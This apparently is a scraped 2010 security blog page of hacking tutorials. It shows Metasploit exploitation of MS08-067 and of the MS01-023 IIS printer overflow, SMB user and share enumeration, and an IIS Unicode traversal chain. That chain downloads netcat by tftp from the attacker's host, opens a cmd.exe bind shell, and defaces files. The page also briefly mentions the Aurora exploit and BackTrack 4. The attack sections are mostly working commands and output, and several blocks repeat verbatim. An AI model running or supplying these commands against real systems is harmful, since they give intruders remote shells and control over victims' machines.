Target: 192.168.1.50 (Windows XP SP2 English)
Yours: 192.168.1.252 (BackTrack 3 with Metasploit 3.x)
Step 1: Scan for SMB Vulnerability (netapi = MS08-067)
nmap -sS --script=smb-check-vulns 192.168.1.50
Step 2: Check the SMB Version (O/S, SP level & Language)
cd /pentest/exploits/msf3
./msfconsole
msf > use scanner/smb/smb_version
msf > set RHOSTS 192.168.1.50
msf > run
Step 3: Exploit with MS08-067 module
msf > use windows/smb/ms08_067_netapi
msf > set PAYLOAD windows/shell/bind_tcp
msf > set RHOST 192.168.1.50
msf > show targets
msf > set TARGET 3 (depends on step# 2)
msf > run
meterpreter > sysinfo
Computer: LON-CL1
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US
Tuesday, March 9, 2010
Tutorial: Enumeration via SMB/CIFS
Enumerate Users
nmap -sS --script=smb-enum-users ip_address
Enumerate Shared Folders
nmap -sS --script=smb-enum-shares ip_address
Enumeration with Metasploit Auxiliary module
cd /pentest/exploits/msf3
./msfconsole
msf > scanner/smb/smb_enumusers
msf > set RHOSTS ip_address
msf > run
nmap -sS --script=smb-enum-users ip_address
Enumerate Shared Folders
nmap -sS --script=smb-enum-shares ip_address
Enumeration with Metasploit Auxiliary module
cd /pentest/exploits/msf3
./msfconsole
msf > scanner/smb/smb_enumusers
msf > set RHOSTS ip_address
msf > run
Monday, March 8, 2010
Tutorial: Metasploit Framework 3.x Basics
cd /pentest/exploits/msf3
./msfconsole
msf > search iis
ISAPI Printer Overflow Exploit
msf > info windows/iis/ms01_023_printer
msf > use windows/iis/ms01_023_printer
msf > show payloads
Bind TCP payload
msf > set PAYLOAD windows/shell/bind_tcp
msf > show options
Set the target IP address
msf > set RHOST 131.107.1.101
msf > exploit
./msfconsole
msf > search iis
ISAPI Printer Overflow Exploit
msf > info windows/iis/ms01_023_printer
msf > use windows/iis/ms01_023_printer
msf > show payloads
Bind TCP payload
msf > set PAYLOAD windows/shell/bind_tcp
msf > show options
Set the target IP address
msf > set RHOST 131.107.1.101
msf > exploit
Tutorial: IIS Unicode Directory Traversal
Step 1: Testing IIS Directory Traversal Exploit
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
Step 2: Upload Netcat to the target machine
Make sure that you have started TFTPD service (Start > Services > TFTPD > Start TFTPD) and copy nc.exe from /pentest/windows_binaries/tools directory to /tmp directory.
cd /pentest/windows_binaries/tools
cp nc.exe /tmp
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp+-i+131.107.1.252+GET+nc.exe
Step 3: Verify if Netcat has been uploaded
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
Step 4: Launch Netcat in listening mode (from the target) port 5555 (launch netcat and spwn a command shell)
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+nc+-v+-l+-p+5555+-d+-e+cmd.exe
Step 5: Connect to the open port on the remote machine
nc -v 131.107.1.101 5555
131.107.1.101: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [131.107.1.101] 5555 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
c:\inetpub\scripts>ipconfig
ipconfig
Windows 2000 IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 131.107.1.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Step 6: Test our priviledge level by writing a file to multiple directories.
c:\inetpub\scripts>echo HACKED BY MR.PEANUT! > hacked.txt
echo HACKED BY MR.PEANUT! > hacked.txt
c:\inetpub\scripts>echo HACKED BY MR.PEANUT! > c:\hacked.txt
echo HACKED BY MR.PEANUT! > c:\hacked.txt
c:\inetpub\scripts>echo HACKED BY MR.PEANUT! > c:\inetpub\wwwroot\hacked.txt
echo HACKED BY MR.PEANUT! > c:\inetpub\wwwroot\hacked.txt
Access is denied.
c:\inetpub\scripts>
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
Step 2: Upload Netcat to the target machine
Make sure that you have started TFTPD service (Start > Services > TFTPD > Start TFTPD) and copy nc.exe from /pentest/windows_binaries/tools directory to /tmp directory.
cd /pentest/windows_binaries/tools
cp nc.exe /tmp
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp+-i+131.107.1.252+GET+nc.exe
Step 3: Verify if Netcat has been uploaded
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
Step 4: Launch Netcat in listening mode (from the target) port 5555 (launch netcat and spwn a command shell)
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+nc+-v+-l+-p+5555+-d+-e+cmd.exe
Step 5: Connect to the open port on the remote machine
nc -v 131.107.1.101 5555
131.107.1.101: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [131.107.1.101] 5555 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
c:\inetpub\scripts>ipconfig
ipconfig
Windows 2000 IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 131.107.1.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Step 6: Test our priviledge level by writing a file to multiple directories.
c:\inetpub\scripts>echo HACKED BY MR.PEANUT! > hacked.txt
echo HACKED BY MR.PEANUT! > hacked.txt
c:\inetpub\scripts>echo HACKED BY MR.PEANUT! > c:\hacked.txt
echo HACKED BY MR.PEANUT! > c:\hacked.txt
c:\inetpub\scripts>echo HACKED BY MR.PEANUT! > c:\inetpub\wwwroot\hacked.txt
echo HACKED BY MR.PEANUT! > c:\inetpub\wwwroot\hacked.txt
Access is denied.
c:\inetpub\scripts>
Tuesday, January 19, 2010
IE Aurora
Internet Explorer "Aurora" Exploit Code released to the public.
Check here:
http://praetorianprefect.com/archives/2010/01/the-aurora-ie-exploit-in-action/
Check here:
http://praetorianprefect.com/archives/2010/01/the-aurora-ie-exploit-in-action/
Monday, January 18, 2010
Thursday, January 14, 2010
BackTrack 4 is Here!!!
Guys,
The long awaited BackTrack 4 (Security Live CD Distro) is finally here.
You can download the ISO file or the VMware version here:
http://www.backtrack-linux.org/downloads/
I have tested it and it works great. I even tried to update it with the latest Metasploit Framework 3.3.4 and it's up and running smoothly.
Lets share some information on this distro since I'm one of the fans.
For those Security freaks in Indonesia, you can join: IndoBackTrack, here is the link:
http://indobacktrack.or.id/
There you can also find some alternative download links for BackTrack 4 Final Release.
Enjoy...
The long awaited BackTrack 4 (Security Live CD Distro) is finally here.
You can download the ISO file or the VMware version here:
http://www.backtrack-linux.org/downloads/
I have tested it and it works great. I even tried to update it with the latest Metasploit Framework 3.3.4 and it's up and running smoothly.
Lets share some information on this distro since I'm one of the fans.
For those Security freaks in Indonesia, you can join: IndoBackTrack, here is the link:
http://indobacktrack.or.id/
There you can also find some alternative download links for BackTrack 4 Final Release.
Enjoy...
Subscribe to:
Posts (Atom)